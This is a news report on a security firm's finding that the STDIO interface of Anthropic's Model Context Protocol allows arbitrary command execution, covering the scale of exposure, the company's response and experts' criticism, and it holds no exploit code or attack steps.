Anthropic AI protocol flaw exposes thousands of servers to attacks
A critical vulnerability in an artificial intelligence protocol developed by Anthropic could expose more than 200,000 instances and thousands of publicly accessible servers to cyberattacks, according to findings from security firm OX Security. The flaw affects the Model Context Protocol, an open standard designed to connect AI systems with external data sources and tools.
Researchers say the issue allows attackers to execute arbitrary commands on vulnerable systems, potentially exposing sensitive user data, internal databases, API keys, and conversation histories. The scale of exposure spans over 7,000 internet facing servers and hundreds of open source projects that rely on the protocol.
Unlike typical software bugs, the vulnerability is rooted in the protocol’s architecture. OX Security found that official software development kits across multiple programming languages inherit the same design flaw. This means developers using the protocol may unknowingly introduce security risks into their systems without clear warnings or safeguards.
The exploit centers on how the protocol handles local process execution through its STDIO interface. Malicious commands can be executed even if the underlying process fails to start properly, with no validation or sanitization checks triggered. Researchers say this behavior creates a silent attack vector that bypasses standard developer tooling alerts.
Anthropic has characterized the behavior as expected and has declined to modify the protocol at its core. The company maintains that the execution model is secure by default and that input sanitization should be handled by developers. This stance has drawn criticism from cybersecurity experts, who argue that leaving such protections to individual developers increases systemic risk.
The findings add to broader concerns around the security of AI infrastructure. OX Security reports it has identified multiple high severity vulnerabilities tied to projects built on the protocol, along with numerous responsible disclosures. Previous research by other firms has also highlighted potential remote code execution paths linked to similar integrations.
Experts warn that relying on developers to secure foundational components could lead to widespread exposure, given inconsistent security practices across the ecosystem. The case highlights growing tensions between rapid AI innovation and the need for robust security standards.
-
17:20
-
17:00
-
16:45
-
16:40
-
16:30
-
16:20
-
16:15
-
16:01
-
16:00
-
15:45
-
15:40
-
15:30
-
15:20
-
15:15
-
15:00
-
15:00
-
14:45
-
14:40
-
14:30
-
14:20
-
14:15
-
14:00
-
13:50
-
13:45
-
13:30
-
13:15
-
13:05
-
12:30
-
12:20
-
12:15
-
12:00
-
12:00
-
11:45
-
11:40
-
11:30
-
11:20
-
11:15
-
11:00
-
11:00
-
10:45
-
10:40
-
10:30
-
10:20
-
10:15
-
10:00
-
10:00
-
09:45
-
09:40
-
09:30
-
09:20
-
09:15
-
09:00
-
09:00
-
08:45
-
08:40
-
08:30
-
08:20
-
08:15
-
08:00
-
07:50
-
07:45
-
07:30
-
07:15
-
07:00
-
06:20